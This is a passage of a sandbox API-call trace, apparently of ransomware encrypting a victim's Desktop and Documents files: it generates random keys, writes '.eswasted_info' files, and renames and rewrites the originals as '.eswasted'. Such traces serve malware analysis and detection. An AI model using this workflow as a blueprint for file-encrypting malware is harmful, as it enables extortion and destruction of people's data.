[0072.622] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.622] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0072.622] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0072.622] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.631] SetEndOfFile (hFile=0x100) returned 1 [0072.633] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.633] CloseHandle (hObject=0x100) returned 1 [0072.635] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0072.635] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ee9d8 | out: hHeap=0x4a0000) returned 1 [0072.635] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0072.636] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0072.636] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.636] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p5tNlZL7.png") returned 54 [0072.636] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x276) returned 0x4e1ab8 [0072.636] lstrcpyW (in: lpString1=0x4e1b24, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.636] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0072.636] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0072.636] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0072.637] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.637] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p5tNlZL7.png.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p5tnlzl7.png.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0072.637] WriteFile (in: hFile=0x100, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.638] SetEndOfFile (hFile=0x100) returned 1 [0072.638] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.638] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.638] lstrcpyW (in: lpString1=0x4e1b24, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.638] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p5tNlZL7.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p5tnlzl7.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p5tNlZL7.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p5tnlzl7.png.eswasted")) returned 1 [0072.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p5tNlZL7.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p5tnlzl7.png.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.639] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0072.639] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x11406 [0072.639] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11406) returned 0xb10000 [0072.639] CloseHandle (hObject=0xfc) returned 1 [0072.643] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0072.643] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.643] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.643] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0072.644] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0072.644] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.652] SetEndOfFile (hFile=0x100) returned 1 [0072.654] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.654] CloseHandle (hObject=0x100) returned 1 [0072.656] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0072.656] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dedf0 | out: hHeap=0x4a0000) returned 1 [0072.656] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0072.656] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0072.657] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.657] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\piP_4V.m4a") returned 52 [0072.657] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x272) returned 0x4e1ab8 [0072.657] lstrcpyW (in: lpString1=0x4e1b20, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.657] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0072.657] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0072.657] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0072.657] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.657] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\piP_4V.m4a.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pip_4v.m4a.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0072.658] WriteFile (in: hFile=0x100, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.659] SetEndOfFile (hFile=0x100) returned 1 [0072.659] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.659] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.659] lstrcpyW (in: lpString1=0x4e1b20, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.659] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\piP_4V.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pip_4v.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\piP_4V.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pip_4v.m4a.eswasted")) returned 1 [0072.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\piP_4V.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pip_4v.m4a.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0072.660] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0072.660] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0xe74d [0072.660] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe74d) returned 0x2d0000 [0072.660] CloseHandle (hObject=0xf8) returned 1 [0072.689] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0072.689] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.689] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.689] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0072.690] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0072.690] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.698] SetEndOfFile (hFile=0x100) returned 1 [0072.747] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0072.747] CloseHandle (hObject=0x100) returned 1 [0072.749] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0072.749] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4deeb8 | out: hHeap=0x4a0000) returned 1 [0072.749] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0072.750] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0072.750] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.750] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WxPH0D.wav") returned 52 [0072.750] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x272) returned 0x4e1ab8 [0072.750] lstrcpyW (in: lpString1=0x4e1b20, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.750] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0072.750] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0072.750] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0072.750] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.751] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WxPH0D.wav.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wxph0d.wav.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0072.751] WriteFile (in: hFile=0x100, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.752] SetEndOfFile (hFile=0x100) returned 1 [0072.752] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.752] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0072.752] lstrcpyW (in: lpString1=0x4e1b20, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.752] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WxPH0D.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wxph0d.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WxPH0D.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wxph0d.wav.eswasted")) returned 1 [0072.753] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WxPH0D.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wxph0d.wav.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0072.753] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0072.753] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0xfd2f [0072.753] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfd2f) returned 0x2d0000 [0072.753] CloseHandle (hObject=0xf8) returned 1 [0072.756] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0072.757] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.757] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.757] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0072.758] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0072.758] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.766] SetEndOfFile (hFile=0x100) returned 1 [0072.768] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0072.768] CloseHandle (hObject=0x100) returned 1 [0072.769] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0072.770] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4df048 | out: hHeap=0x4a0000) returned 1 [0072.770] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0072.802] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0072.802] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.802] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y7t1_ud9hiI.wav") returned 57 [0072.802] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x27c) returned 0x4e1ab8 [0072.802] lstrcpyW (in: lpString1=0x4e1b2a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.802] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0072.802] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0072.803] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0072.803] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.803] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y7t1_ud9hiI.wav.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\y7t1_ud9hii.wav.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0072.803] WriteFile (in: hFile=0x100, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.804] SetEndOfFile (hFile=0x100) returned 1 [0072.804] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.804] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.804] lstrcpyW (in: lpString1=0x4e1b2a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.804] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y7t1_ud9hiI.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\y7t1_ud9hii.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y7t1_ud9hiI.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\y7t1_ud9hii.wav.eswasted")) returned 1 [0072.805] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y7t1_ud9hiI.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\y7t1_ud9hii.wav.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.805] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0072.805] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x57d5 [0072.805] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x57d5) returned 0x2d0000 [0072.805] CloseHandle (hObject=0x110) returned 1 [0072.807] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0072.808] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0072.808] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.808] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0072.809] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0072.809] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.817] SetEndOfFile (hFile=0x100) returned 1 [0072.819] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.819] CloseHandle (hObject=0x100) returned 1 [0072.820] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0072.820] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4eec58 | out: hHeap=0x4a0000) returned 1 [0072.821] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0072.821] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0072.821] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.821] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\4kSrTtlrIRRlrfGzezvH.doc") returned 83 [0072.821] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2b0) returned 0x4f6210 [0072.821] lstrcpyW (in: lpString1=0x4f62b6, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.821] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0072.821] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0072.822] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0072.822] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.822] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\4kSrTtlrIRRlrfGzezvH.doc.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\4ksrttlrirrlrfgzezvh.doc.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0072.864] WriteFile (in: hFile=0x100, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.865] SetEndOfFile (hFile=0x100) returned 1 [0072.865] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.865] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.865] lstrcpyW (in: lpString1=0x4f62b6, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.865] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\4kSrTtlrIRRlrfGzezvH.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\4ksrttlrirrlrfgzezvh.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\4kSrTtlrIRRlrfGzezvH.doc.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\4ksrttlrirrlrfgzezvh.doc.eswasted")) returned 1 [0072.866] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\4kSrTtlrIRRlrfGzezvH.doc.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\4ksrttlrirrlrfgzezvh.doc.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0072.866] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0072.866] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x1377c [0072.866] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1377c) returned 0xb10000 [0072.866] CloseHandle (hObject=0xf8) returned 1 [0072.870] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0072.871] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0072.871] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.871] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0072.872] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0072.872] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.904] SetEndOfFile (hFile=0x100) returned 1 [0072.945] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0072.945] CloseHandle (hObject=0x100) returned 1 [0072.974] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f6210 | out: hHeap=0x4a0000) returned 1 [0072.974] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4eeee0 | out: hHeap=0x4a0000) returned 1 [0072.975] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0072.975] 